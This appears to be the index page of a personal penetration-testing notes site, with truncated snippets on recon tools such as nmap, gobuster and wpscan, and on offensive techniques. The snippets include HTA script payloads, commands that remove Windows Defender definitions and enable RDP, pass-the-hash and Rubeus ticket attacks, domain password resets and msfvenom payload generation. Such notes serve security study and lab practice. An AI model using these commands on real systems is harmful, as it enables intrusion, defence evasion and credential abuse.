Hacking

Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/d...

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV ...

HTA payloads Ping <html> <head> <script language="JScript"> var shell = new ActiveXObject(...

PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Pri...

Blast AV and enable RDP with hashes cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRu...

Linux - SSH On your host cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t r...

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Ap...

Tools required <https://github.com/its-a-feature/KeytabParser> <https://github.com/sosdave/KeyT...

Via command prompt cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinit...

Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the belo...

Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 targe...

Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p ...

Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET...

Basic usage nikto -host http://TARGET_IP -p PORT

Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web...

Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP ...

1. Enumerate common names Get-DomainComputer | select cn

Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl h...

Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Forc...

You will need to first upload the binaries to the target, either via a meterpreter shell or power...

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Appl...